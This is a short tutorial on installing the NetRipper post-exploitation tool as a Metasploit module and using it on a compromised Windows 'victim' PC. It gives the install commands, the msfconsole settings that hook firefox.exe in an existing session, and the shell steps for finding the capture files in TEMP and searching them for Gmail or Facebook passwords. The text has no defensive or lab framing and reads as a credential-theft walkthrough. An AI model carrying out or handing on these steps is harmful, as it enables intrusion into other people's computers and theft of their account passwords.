NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.
Open your kali Linux terminal and type the following command
Now install the netripper in kali linux step by step process is given below.
- cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
- mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
- g++ -Wall netripper.cpp -o netripper
- cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
- cd ../Release
- cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll
Now Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)
Now bypass the UAC visit
Now search netripper
type use post/windows/gather/netripper
msf exploit (netripper)>set verbose true
msf exploit (netripper)>set processnames firefox.exe
msf exploit (netripper)>set session 2
msf exploit (netripper)>exploit
Now it will automatically create a NetRripper folder in the target pc on following location
You have access to the victims PC. Use “Sessions” and the Session number to connect to the session. And Now Type “sessions –id ID“and type shell to get command prompt of victim pc.
The captured data is saved by default in TEMP (e.g. C:\Users\RAJ\AppData\Local\Temp\NetRipper).
Now goto the above path by using the command.
Now type Dir command and it will show the list of text files.
In our example, the output file named 1004_firefox.exe_PR_Write.txt may contain the password.
We can read that text file from command line using type command.
Now press ctrl +shift+ f it will open find open & type &pass.
Now you can find the password of gmail or facebook as shown below.